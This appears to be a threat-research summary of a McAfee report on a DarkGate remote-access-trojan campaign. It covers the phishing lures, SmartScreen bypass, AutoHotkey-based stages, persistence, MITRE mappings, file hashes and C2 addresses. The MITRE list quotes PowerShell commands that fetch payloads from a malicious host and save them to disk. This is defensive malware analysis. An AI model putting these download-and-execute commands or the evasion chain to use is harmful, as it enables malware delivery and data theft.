Threat Research

The Darkgate Menace: Autohotkey Exploitation and Smartscreen Evasion

McAfee

McAfee Labs uncovered a two-stage DarkGate infection chain beginning with an HTML entry point and leveraging AutoHotkey for payload execution, including SmartScreen evasion. The campaign combines VBScript, PowerShell, WebDAV/OneDrive deception, and persistence mechanisms to drop a Delphi-based RAT that exfiltrates to a C2 IP.

Keypoints

  • DarkGate is a Delphi-based Remote Access Trojan marketed as MaaS on a Russian-language cybercrime forum since 2018.
  • The infection chain starts with HTML phishing and unfolds through AutoHotkey-based stages to deliver the final DarkGate payload.
  • DarkGate includes evasion tactics that bypass Defender SmartScreen, with CVEs CVE-2023-36025 and CVE-2024-21412 enabling this bypass.
  • Two initial vectors—HTML and XLS—carry identical DarkGate shellcode and payload, including a deceptive WebDAV/Onedrive-related flow.
  • The chain deploys VBScript and PowerShell to fetch and execute additional payloads before invoking AutoHotkey to run a script that decodes and executes shellcode.
  • Persistence is achieved via a .lnk startup item and a dropped hidden folder (hakeede) with replicated artifacts, while exfiltration targets 5.252.177.207.

MITRE Techniques

  • [T1566.001] Phishing – The infection chain initiates with a phishing HTML page masquerading as a Word document. ‘phishing HTML page masquerading as a Word document’
  • [T1204.002] User Execution – Users are prompted to open the document in “Cloud View,” creating a deceptive lure for interaction. ‘Users are prompted to open the document in “Cloud View”’
  • [T1027] Obfuscated/Compressed Data – The HTML/referenced content uses string reversal and base64 decoding to hide payloads. ‘On reversing and base64 decoding the yellow highlighted content…’
  • [T1059.001] PowerShell – PowerShell is used to download and execute a script from a remote URL via Invoke-RestMethod. ‘Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’’
  • [T1059.005] VBScript – The chain begins with a VBScript executed by WScript to drop and run subsequent payloads. ‘The sequence of commands begins with the execution of the VBScript file located at “C:UsersadminAppDataLocalMicrosoftWindowsINetCacheIEU4IRGC29Report-26-2024[1].vbs”‘
  • [T1105] Ingress Tool Transfer – VBScript/PowerShell fetches and downloads additional components from remote URLs. ‘Invoke-WebRequest -Uri “http://withupdate.com/oudowibspr” -OutFile ‘C:/rjtu/temp_AutoHotkey.exe’’
  • [T1547.001] Boot or Logon Autostart – A .lnk file is dropped into the startup folder to ensure persistence. ‘For maintaining persistence, a .lnk file is dropped in startup folder’

Indicators of Compromise

  • [File hash] Html file – 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
  • [File hash] URL file – 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833
  • [File hash] VBS – 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
  • [File hash] autohotkey.exe – 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
  • [File hash] AHK script – dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
  • [File hash] test.txt – 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
  • [File hash] DarkGate exe – 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031
  • [IP] 5.252.177.207 – Exfiltration target / C2 endpoint
  • [File hash] XLS file – 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4
  • [File hash] VBS – 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
  • [File hash] LNK file – 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e
  • [IP] 103.124.106.237 – Command and control remote script or download source

Read more: https://www.mcafee.com/blogs/?p=190356